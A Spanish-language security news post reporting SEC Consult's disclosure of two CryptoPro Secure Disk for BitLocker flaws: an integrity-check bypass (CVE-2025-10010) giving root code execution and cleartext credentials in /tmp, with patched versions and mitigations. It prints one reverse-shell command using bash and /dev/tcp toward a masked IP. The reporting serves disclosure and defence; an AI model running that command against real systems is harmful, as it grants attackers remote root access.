Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Múltiples vulnerabilidades en CPSD CryptoPro Secure Disk para BitLocker permiten acceso root y robo de credenciales


Se han descubierto múltiples vulnerabilidades en CryptoPro Secure Disk (CPSD) para BitLocker, una solución de cifrado ampliamente utilizada. Estos fallos podrían permitir que un atacante con acceso físico a un dispositivo obtenga acceso persistente como root y robe credenciales sensibles. Los problemas, identificados por investigadores de seguridad de SEC Consult Vulnerability Lab, ponen de relieve riesgos significativos para las organizaciones





Se han descubierto múltiples vulnerabilidades en CryptoPro Secure Disk (CPSD) para BitLocker, una solución de cifrado ampliamente utilizada.

Estos fallos podrían permitir que un atacante con acceso físico a un dispositivo obtenga acceso persistente como root y robe credenciales sensibles.

Los problemas identificados por investigadores de seguridad de SEC Consult Vulnerability Lab destacan riesgos significativos para las organizaciones que dependen de este software para la protección de datos.

CVECVSSDetalles
CVE-2025-10010N/ABypass de integridad permite ejecución de código como root.
N/AN/ADatos en texto claro en /tmp exponen credenciales.

Bypass de Validación de Integridad

La primera vulnerabilidad, designada como CVE-2025-10010, implica un bypass de validación de integridad.

CryptoPro Secure Disk inicia un sistema operativo Linux mínimo para autenticar a los usuarios y luego descifra la partición de Windows con BitLocker.

Este sistema Linux reside en una partición sin cifrar, accesible para cualquiera que pueda llegar físicamente al disco duro o arrancar el sistema desde un medio externo.

Aunque el sistema utiliza la Arquitectura de Medición de Integridad (IMA) del kernel de Linux para verificar archivos, los investigadores descubrieron que IMA no valida ciertos archivos de configuración.

bash -c 'exec bash -i >/dev/tcp/192.168.XXX.XXX/9999 <&1'

Al manipular estos archivos, un atacante puede ejecutar código arbitrario con privilegios de root. Esto podría permitirle instalar una puerta trasera y monitorear o acceder a datos durante la ejecución sin activar errores en el sistema.

ProductoVersiones VulnerablesVersiones Corregidas
CPSD CryptoPro Secure Disk< 7.6.6 / < 7.7.17.6.6 / 7.7.1

Almacenamiento en Texto Claro de Datos Sensibles

El segundo problema se refiere al almacenamiento de datos sensibles en texto claro. Cuando los usuarios olvidan sus credenciales, CryptoPro Secure Disk ofrece una función de soporte en línea que se conecta a una red predefinida.

Según SEC Consult, para facilitar esta conexión, el sistema almacena secretos necesarios, como certificados y contraseñas, en texto claro dentro de la carpeta temporal /tmp.

Si un atacante ya ha obtenido acceso al entorno Linux, posiblemente a través de la primera vulnerabilidad, puede leer fácilmente estos archivos.

Credenciales de certificados en texto claro exponen acceso a WLAN y permiten bypass de 802.1X (fuente: sec-consult)
Credenciales de certificados en texto claro exponen acceso a WLAN y permiten bypass de 802.1X (fuente: sec-consult)

Esta información podría usarse para acceder a redes internas o eludir controles de acceso a la red, comprometiendo aún más la infraestructura de la organización.

El proveedor, CPSD, fue notificado de estos problemas en junio de 2025 y desde entonces ha proporcionado parches. Las versiones 7.6.6 y 7.7.1 solucionan las vulnerabilidades.

Las organizaciones que utilizan CryptoPro Secure Disk deben actualizar su software de inmediato. Si no es posible actualizar de forma inmediata, el proveedor recomienda cifrar la partición PBA, una función disponible desde la versión 7.6.0.

A partir de la versión 7.7, este cifrado está habilitado por defecto, mitigando el riesgo de modificaciones no autorizadas de archivos.

SEC Consult también aconseja a las organizaciones realizar revisiones de seguridad exhaustivas de sus soluciones de cifrado para identificar y abordar cualquier otra posible debilidad.



Fuentes:
https://cybersecuritynews.com/vulnerabilities-in-cpsd-cryptopro-secure-disk-for-bitlocker/

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.